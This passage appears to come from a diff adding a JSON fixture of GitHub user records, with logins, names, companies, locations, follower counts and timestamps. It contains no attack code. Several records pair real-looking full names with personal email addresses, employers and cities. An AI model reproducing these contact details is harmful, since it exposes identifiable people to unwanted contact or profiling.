"2024-09-11T21:36:20.552Z", + "name": "", + "login": "Sam2243", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3024672?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2012-12-12T11:04:23Z", + "updated_at": "2024-01-07T19:22:11Z", + "node_id": "MDQ6VXNlcjMwMjQ2NzI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 727, + "fields": { + "nest_created_at": "2024-09-11T21:36:21.396Z", + "nest_updated_at": "2024-09-11T21:36:21.396Z", + "name": "Jyotiranjan Jena", + "login": "jrjena136", + "email": "jrjena136@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/14884739?v=4", + "company": "Star Health and Allied Insurance", + "location": "Pune", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 38, + "created_at": "2015-09-29T06:10:18Z", + "updated_at": "2024-08-27T11:35:30Z", + "node_id": "MDQ6VXNlcjE0ODg0NzM5", + "bio": "Any fool can write code that a computer can understand. Good programmers write code that humans can understand.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 728, + "fields": { + "nest_created_at": "2024-09-11T21:36:22.223Z", + "nest_updated_at": "2024-09-12T02:39:26.285Z", + "name": "Simon Greatrix", + "login": "simon-greatrix", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10000910?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 3, + "public_repositories_count": 20, + "created_at": "2014-11-29T16:06:30Z", + "updated_at": "2024-07-11T15:54:51Z", + "node_id": "MDQ6VXNlcjEwMDAwOTEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 729, + "fields": { + "nest_created_at": "2024-09-11T21:36:23.023Z", + "nest_updated_at": "2024-09-11T21:36:23.023Z", + "name": "Johannes Lichtenberger", + "login": "JohannesLichtenberger", + "email": "Lichtenberger.Johannes@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1202851?v=4", + "company": "https://github.com/sirixdb", + "location": "Germany", + "collaborators_count": 0, + "following_count": 259, + "followers_count": 78, + "public_gists_count": 25, + "public_repositories_count": 43, + "created_at": "2011-11-17T19:39:35Z", + "updated_at": "2024-09-10T16:06:24Z", + "node_id": "MDQ6VXNlcjEyMDI4NTE=", + "bio": "", + "is_hireable": true, + "twitter_username": "johannes_1983" + } +}, +{ + "model": "github.user", + "pk": 730, + "fields": { + "nest_created_at": "2024-09-11T21:36:23.856Z", + "nest_updated_at": "2024-09-11T21:36:23.856Z", + "name": "myin", + "login": "myin142", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16972565?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 10, + "public_gists_count": 3, + "public_repositories_count": 16, + "created_at": "2016-01-30T11:21:45Z", + "updated_at": "2024-09-05T07:47:31Z", + "node_id": "MDQ6VXNlcjE2OTcyNTY1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 731, + "fields": { + "nest_created_at": "2024-09-11T21:36:24.689Z", + "nest_updated_at": "2024-09-11T21:36:24.689Z", + "name": "", + "login": "voborl00", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3495229?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2013-02-06T20:20:18Z", + "updated_at": "2024-08-22T16:54:32Z", + "node_id": "MDQ6VXNlcjM0OTUyMjk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 732, + "fields": { + "nest_created_at": "2024-09-11T21:36:25.917Z", + "nest_updated_at": "2024-09-11T21:36:25.917Z", + "name": "Ivan Pizhenko", + "login": "IvanPizhenko", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11859904?v=4", + "company": "", + "location": "Ukraine", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 10, + "public_gists_count": 5, + "public_repositories_count": 11, + "created_at": "2015-04-08T19:49:01Z", + "updated_at": "2024-08-09T11:26:41Z", + "node_id": "MDQ6VXNlcjExODU5OTA0", + "bio": "Sr. Software Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 733, + "fields": { + "nest_created_at": "2024-09-11T21:36:26.731Z", + "nest_updated_at": "2024-09-11T21:36:26.731Z", + "name": "", + "login": "alelievre44", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/86373072?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-06-23T17:02:14Z", + "updated_at": "2021-06-23T17:03:58Z", + "node_id": "MDQ6VXNlcjg2MzczMDcy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 734, + "fields": { + "nest_created_at": "2024-09-11T21:36:27.546Z", + "nest_updated_at": "2024-09-11T21:36:27.546Z", + "name": "", + "login": "jurajvalkucak", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44778631?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-11-05T15:08:41Z", + "updated_at": "2023-11-14T11:56:19Z", + "node_id": "MDQ6VXNlcjQ0Nzc4NjMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 735, + "fields": { + "nest_created_at": "2024-09-11T21:36:28.374Z", + "nest_updated_at": "2024-09-11T21:36:28.374Z", + "name": "Julien Poulton", + "login": "CGjupoulton", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31545590?v=4", + "company": "CodinGame", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 9, + "public_gists_count": 6, + "public_repositories_count": 19, + "created_at": "2017-09-01T15:51:53Z", + "updated_at": "2024-09-02T10:51:03Z", + "node_id": "MDQ6VXNlcjMxNTQ1NTkw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 736, + "fields": { + "nest_created_at": "2024-09-11T21:36:29.209Z", + "nest_updated_at": "2024-09-11T21:36:29.209Z", + "name": "akshat", + "login": "log2akshat", + "email": "akshat-pg8@iiitmk.ac.in", + "avatar_url": "https://avatars.githubusercontent.com/u/3608604?v=4", + "company": "@Zimbra @ZimbraOS", + "location": "Pune", + "collaborators_count": 0, + "following_count": 39, + "followers_count": 20, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2013-02-16T05:22:10Z", + "updated_at": "2024-09-08T09:39:41Z", + "node_id": "MDQ6VXNlcjM2MDg2MDQ=", + "bio": "", + "is_hireable": true, + "twitter_username": "log2akshat" + } +}, +{ + "model": "github.user", + "pk": 737, + "fields": { + "nest_created_at": "2024-09-11T21:36:30.038Z", + "nest_updated_at": "2024-09-11T21:36:30.038Z", + "name": "Clement Dumas", + "login": "Butanium", + "email": "butanium.contact@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/55806347?v=4", + "company": "ENS Paris-Saclay", + "location": "Paris-Saclay, France", + "collaborators_count": 0, + "following_count": 59, + "followers_count": 45, + "public_gists_count": 2, + "public_repositories_count": 55, + "created_at": "2019-09-25T17:21:00Z", + "updated_at": "2024-09-10T10:40:40Z", + "node_id": "MDQ6VXNlcjU1ODA2MzQ3", + "bio": "I'm Clement, student at ENS Paris Saclay, France.", + "is_hireable": false, + "twitter_username": "butanium_" + } +}, +{ + "model": "github.user", + "pk": 738, + "fields": { + "nest_created_at": "2024-09-11T21:36:30.858Z", + "nest_updated_at": "2024-09-11T21:36:30.858Z", + "name": "Gábor Garancsi", + "login": "corebonts", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3338057?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2013-01-22T10:52:19Z", + "updated_at": "2024-02-29T08:58:28Z", + "node_id": "MDQ6VXNlcjMzMzgwNTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 739, + "fields": { + "nest_created_at": "2024-09-11T21:36:31.664Z", + "nest_updated_at": "2024-09-11T21:36:31.664Z", + "name": "Matthias Unterfrauner", + "login": "matthiasunt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17273057?v=4", + "company": "HubSpot", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 49, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2016-02-16T13:35:10Z", + "updated_at": "2024-09-06T09:30:29Z", + "node_id": "MDQ6VXNlcjE3MjczMDU3", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 740, + "fields": { + "nest_created_at": "2024-09-11T21:36:32.533Z", + "nest_updated_at": "2024-09-11T21:36:32.533Z", + "name": "Adele Bendayan", + "login": "adelebendayan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20315743?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-07-06T07:57:59Z", + "updated_at": "2024-08-25T13:28:25Z", + "node_id": "MDQ6VXNlcjIwMzE1NzQz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 741, + "fields": { + "nest_created_at": "2024-09-11T21:36:33.398Z", + "nest_updated_at": "2024-09-11T21:36:33.398Z", + "name": "Dhiraj Badu", + "login": "dhirajbadu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46293891?v=4", + "company": "", + "location": "Kathmandu, Nepal", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2019-01-01T08:59:46Z", + "updated_at": "2024-04-16T05:42:40Z", + "node_id": "MDQ6VXNlcjQ2MjkzODkx", + "bio": "Software Engineer with huge experience in Java, Grails, Spring Boot, AWS.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 742, + "fields": { + "nest_created_at": "2024-09-11T21:36:34.226Z", + "nest_updated_at": "2024-09-11T21:36:34.226Z", + "name": "Laura", + "login": "lauralanwu", + "email": "laura.lan.wu@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/27690581?v=4", + "company": "", + "location": "Toronto", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2017-04-17T14:47:49Z", + "updated_at": "2024-08-23T14:35:26Z", + "node_id": "MDQ6VXNlcjI3NjkwNTgx", + "bio": "Experienced software professional who love to write high quality code that stands out and truly helps business and organizations. ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 743, + "fields": { + "nest_created_at": "2024-09-11T21:36:35.849Z", + "nest_updated_at": "2024-09-11T21:36:35.849Z", + "name": "", + "login": "spaffrath", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33729384?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2017-11-16T17:04:14Z", + "updated_at": "2024-07-08T14:21:11Z", + "node_id": "MDQ6VXNlcjMzNzI5Mzg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 744, + "fields": { + "nest_created_at": "2024-09-11T21:36:36.689Z", + "nest_updated_at": "2024-09-11T21:36:39.216Z", + "name": "", + "login": "jimmyleeeeee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31074398?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-08-16T16:09:54Z", + "updated_at": "2024-04-10T09:32:06Z", + "node_id": "MDQ6VXNlcjMxMDc0Mzk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 745, + "fields": { + "nest_created_at": "2024-09-11T21:36:37.551Z", + "nest_updated_at": "2024-09-22T19:45:07.493Z", + "name": "", + "login": "mymhealthltd-joshengland", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/98313117?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-01-24T09:16:00Z", + "updated_at": "2022-01-24T09:35:50Z", + "node_id": "U_kgDOBdwjnQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 746, + "fields": { + "nest_created_at": "2024-09-11T21:36:38.393Z", + "nest_updated_at": "2024-09-11T21:36:38.393Z", + "name": "Lee Read", + "login": "lread", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/967328?v=4", + "company": "", + "location": "Ottawa, Ontario, Canada", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 43, + "public_gists_count": 1, + "public_repositories_count": 109, + "created_at": "2011-08-08T19:59:03Z", + "updated_at": "2024-07-09T12:51:47Z", + "node_id": "MDQ6VXNlcjk2NzMyOA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 747, + "fields": { + "nest_created_at": "2024-09-11T21:36:40.081Z", + "nest_updated_at": "2024-09-11T21:36:40.081Z", + "name": "", + "login": "KishorMandve", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/88242110?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-07-31T14:33:32Z", + "updated_at": "2024-04-15T05:05:41Z", + "node_id": "MDQ6VXNlcjg4MjQyMTEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 748, + "fields": { + "nest_created_at": "2024-09-11T21:36:40.901Z", + "nest_updated_at": "2024-09-11T21:36:40.901Z", + "name": "", + "login": "spyro2000", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8479925?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2014-08-18T13:21:20Z", + "updated_at": "2024-07-24T07:09:13Z", + "node_id": "MDQ6VXNlcjg0Nzk5MjU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 749, + "fields": { + "nest_created_at": "2024-09-11T21:36:41.696Z", + "nest_updated_at": "2024-09-11T21:36:41.696Z", + "name": "", + "login": "rupeshtelus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/96474570?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-12-21T10:53:13Z", + "updated_at": "2022-08-08T08:46:01Z", + "node_id": "U_kgDOBcAVyg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 750, + "fields": { + "nest_created_at": "2024-09-11T21:36:42.497Z", + "nest_updated_at": "2024-09-11T21:36:42.497Z", + "name": "", + "login": "Pamplemousse", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2647236?v=4", + "company": "@Oracle", + "location": "Solar System, Milky Way", + "collaborators_count": 0, + "following_count": 82, + "followers_count": 68, + "public_gists_count": 20, + "public_repositories_count": 48, + "created_at": "2012-10-25T07:16:59Z", + "updated_at": "2024-05-21T06:58:56Z", + "node_id": "MDQ6VXNlcjI2NDcyMzY=", + "bio": "@Oracle employee; Views and opinions are my own.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 751, + "fields": { + "nest_created_at": "2024-09-11T21:36:43.314Z", + "nest_updated_at": "2024-09-11T21:36:43.314Z", + "name": "Arpit", + "login": "arpitbansal1581", + "email": "arpitbansal1581@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13675266?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2015-08-06T08:43:02Z", + "updated_at": "2024-06-11T06:11:06Z", + "node_id": "MDQ6VXNlcjEzNjc1MjY2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 752, + "fields": { + "nest_created_at": "2024-09-11T21:36:44.156Z", + "nest_updated_at": "2024-09-11T21:36:44.156Z", + "name": "Jeremie Miserez", + "login": "jmiserez", + "email": "jeremie@miserez.org", + "avatar_url": "https://avatars.githubusercontent.com/u/5045692?v=4", + "company": "", + "location": "Zurich, Switzerland", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 11, + "public_gists_count": 17, + "public_repositories_count": 22, + "created_at": "2013-07-19T08:23:36Z", + "updated_at": "2024-08-22T09:15:13Z", + "node_id": "MDQ6VXNlcjUwNDU2OTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 753, + "fields": { + "nest_created_at": "2024-09-11T21:36:45.002Z", + "nest_updated_at": "2024-09-11T21:36:45.002Z", + "name": "Lakshmisagar Aruvanahalli Shridhar", + "login": "lakshmisagar-as", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52062643?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2019-06-21T05:39:38Z", + "updated_at": "2024-08-12T16:05:11Z", + "node_id": "MDQ6VXNlcjUyMDYyNjQz", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 754, + "fields": { + "nest_created_at": "2024-09-11T21:36:45.796Z", + "nest_updated_at": "2024-09-11T21:36:45.796Z", + "name": "", + "login": "mb34890", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17943535?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-03-19T07:30:55Z", + "updated_at": "2023-04-12T21:22:34Z", + "node_id": "MDQ6VXNlcjE3OTQzNTM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 755, + "fields": { + "nest_created_at": "2024-09-11T21:36:46.594Z", + "nest_updated_at": "2024-09-11T21:36:46.594Z", + "name": "Yigitcan Nalci", + "login": "ragcrix", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6944730?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 6, + "public_gists_count": 24, + "public_repositories_count": 22, + "created_at": "2014-03-13T19:28:10Z", + "updated_at": "2024-06-08T21:34:36Z", + "node_id": "MDQ6VXNlcjY5NDQ3MzA=", + "bio": "Software Engineer. Sports lover. Curious about science and technology.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 756, + "fields": { + "nest_created_at": "2024-09-11T21:36:47.424Z", + "nest_updated_at": "2024-09-11T21:36:47.424Z", + "name": "Barış Yüksel", + "login": "brsyuksel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/320021?v=4", + "company": "", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 41, + "public_gists_count": 3, + "public_repositories_count": 23, + "created_at": "2010-07-01T12:41:58Z", + "updated_at": "2024-09-07T18:32:18Z", + "node_id": "MDQ6VXNlcjMyMDAyMQ==", + "bio": "", + "is_hireable": true, + "twitter_username": "ybaroj" + } +}, +{ + "model": "github.user", + "pk": 757, + "fields": { + "nest_created_at": "2024-09-11T21:36:48.232Z", + "nest_updated_at": "2024-09-11T21:36:48.232Z", + "name": "Lee Coller", + "login": "lcoller", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24683250?v=4", + "company": "Oracle Corporation", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-12-20T18:04:25Z", + "updated_at": "2024-01-22T21:52:22Z", + "node_id": "MDQ6VXNlcjI0NjgzMjUw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 758, + "fields": { + "nest_created_at": "2024-09-11T21:36:49.069Z", + "nest_updated_at": "2024-09-11T21:36:49.069Z", + "name": "", + "login": "ihass", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7434288?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2014-04-28T23:59:42Z", + "updated_at": "2024-07-31T12:08:04Z", + "node_id": "MDQ6VXNlcjc0MzQyODg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 759, + "fields": { + "nest_created_at": "2024-09-11T21:36:49.881Z", + "nest_updated_at": "2024-09-11T21:36:49.881Z", + "name": "Robert Munteanu", + "login": "rombert", + "email": "robert.munteanu@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/21237?v=4", + "company": "@adobe ", + "location": "Switzerland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 94, + "public_gists_count": 10, + "public_repositories_count": 72, + "created_at": "2008-08-20T08:39:10Z", + "updated_at": "2024-08-29T17:32:08Z", + "node_id": "MDQ6VXNlcjIxMjM3", + "bio": "", + "is_hireable": false, + "twitter_username": "rombert" + } +}, +{ + "model": "github.user", + "pk": 760, + "fields": { + "nest_created_at": "2024-09-11T21:36:50.696Z", + "nest_updated_at": "2024-09-11T21:36:50.696Z", + "name": "", + "login": "SasiprabuK", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/116204011?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-10-19T18:13:50Z", + "updated_at": "2022-10-19T18:13:50Z", + "node_id": "U_kgDOBu0h6w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 761, + "fields": { + "nest_created_at": "2024-09-11T21:36:51.516Z", + "nest_updated_at": "2024-09-11T21:36:51.516Z", + "name": "", + "login": "iloveuaa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49469533?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2019-04-10T05:25:57Z", + "updated_at": "2024-08-06T07:41:57Z", + "node_id": "MDQ6VXNlcjQ5NDY5NTMz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 762, + "fields": { + "nest_created_at": "2024-09-11T21:36:52.312Z", + "nest_updated_at": "2024-09-11T21:36:52.312Z", + "name": "", + "login": "zubairkhan1133", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52484790?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-07-03T07:03:58Z", + "updated_at": "2023-10-07T03:04:55Z", + "node_id": "MDQ6VXNlcjUyNDg0Nzkw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 763, + "fields": { + "nest_created_at": "2024-09-11T21:36:53.129Z", + "nest_updated_at": "2024-09-11T21:36:53.129Z", + "name": "", + "login": "anupamamanish", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72487304?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-10-07T05:59:36Z", + "updated_at": "2020-10-09T04:24:11Z", + "node_id": "MDQ6VXNlcjcyNDg3MzA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 764, + "fields": { + "nest_created_at": "2024-09-11T21:36:53.947Z", + "nest_updated_at": "2024-09-11T21:36:53.947Z", + "name": "", + "login": "bhargavivuttaravilli123", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31948389?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-09-14T05:51:27Z", + "updated_at": "2023-05-28T15:08:08Z", + "node_id": "MDQ6VXNlcjMxOTQ4Mzg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 765, + "fields": { + "nest_created_at": "2024-09-11T21:36:54.760Z", + "nest_updated_at": "2024-09-11T21:36:54.760Z", + "name": "Osman Koçak", + "login": "kocakosm", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1266709?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2011-12-15T23:22:17Z", + "updated_at": "2024-08-07T20:02:49Z", + "node_id": "MDQ6VXNlcjEyNjY3MDk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 766, + "fields": { + "nest_created_at": "2024-09-11T21:36:55.585Z", + "nest_updated_at": "2024-09-11T21:36:55.585Z", + "name": "", + "login": "woodpexer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/137872325?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-06-27T07:31:10Z", + "updated_at": "2023-06-27T07:31:10Z", + "node_id": "U_kgDOCDfDxQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 767, + "fields": { + "nest_created_at": "2024-09-11T21:36:56.395Z", + "nest_updated_at": "2024-09-11T21:36:56.395Z", + "name": "", + "login": "aschufft", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/126555780?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-02-28T08:05:14Z", + "updated_at": "2023-02-28T08:05:14Z", + "node_id": "U_kgDOB4sWhA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 768, + "fields": { + "nest_created_at": "2024-09-11T21:36:57.950Z", + "nest_updated_at": "2024-09-11T21:36:57.951Z", + "name": "", + "login": "stefan-hdt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/67943924?v=4", + "company": "", + "location": "Munich", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-07-07T06:05:42Z", + "updated_at": "2024-06-12T07:11:46Z", + "node_id": "MDQ6VXNlcjY3OTQzOTI0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 769, + "fields": { + "nest_created_at": "2024-09-11T21:36:58.823Z", + "nest_updated_at": "2024-09-11T21:36:58.823Z", + "name": "", + "login": "anupbhore", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29601854?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-06-21T12:23:17Z", + "updated_at": "2023-09-21T03:59:35Z", + "node_id": "MDQ6VXNlcjI5NjAxODU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 770, + "fields": { + "nest_created_at": "2024-09-11T21:36:59.620Z", + "nest_updated_at": "2024-09-22T19:45:06.868Z", + "name": "", + "login": "subbudvk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/115633743?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2022-10-12T11:50:28Z", + "updated_at": "2024-09-11T06:23:09Z", + "node_id": "U_kgDOBuRuTw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 771, + "fields": { + "nest_created_at": "2024-09-11T21:37:00.447Z", + "nest_updated_at": "2024-09-11T21:37:00.448Z", + "name": "MANTRI MOUNIKA", + "login": "mantri-mounika", + "email": "mounikamantri12@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/33999572?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 37, + "created_at": "2017-11-26T09:59:30Z", + "updated_at": "2024-09-02T04:12:42Z", + "node_id": "MDQ6VXNlcjMzOTk5NTcy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 772, + "fields": { + "nest_created_at": 